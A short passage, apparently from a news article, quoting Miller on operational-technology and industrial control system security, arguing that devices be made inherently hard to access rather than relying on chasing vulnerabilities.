“Rather than continuing to chase vulnerabilities and trying to implement an IT approach to OT security, we should instead think about how we can make critical devices inherently secure and more difficult for hackers to gain access,” Miller said. “Without access to an ICS device, hackers cannot begin to take advantage of a vulnerability. Certainly, defense in depth methodologies and good cyber hygiene are a part of the solution, but what happens when those techniques fail, and the actors can remotely access a device and potentially manipulate it?”